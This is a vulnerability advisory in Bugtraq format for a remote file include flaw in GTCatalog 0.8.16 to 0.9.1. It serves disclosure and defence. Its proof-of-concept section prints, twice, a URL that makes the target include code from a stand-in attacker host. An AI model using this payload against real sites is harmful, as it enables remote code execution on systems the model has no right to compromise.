GTCatalog Remote File Include Vulnerability
BID:6998
Info
GTCatalog Remote File Include Vulnerability
| Bugtraq ID: | 6998 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 03 2003 12:00AM |
| Updated: | Mar 03 2003 12:00AM |
| Credit: | Discovery of this vulnerability credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
GTCatalog GTCatalog 0.9.1 GTCatalog GTCatalog 0.9 GTCatalog GTCatalog 0.8.16 |
| Not Vulnerable: | |
Exploit / POC
GTCatalog Remote File Include Vulnerability
The following proof of concept was provided:
http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc
The following proof of concept was provided:
http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc
Solution / Fix
GTCatalog Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
GTCatalog Remote File Include Vulnerability
References:
References:
- GTCatalog (GTCatalog)
- GTcatalog (PHP) ("Frog Man"
)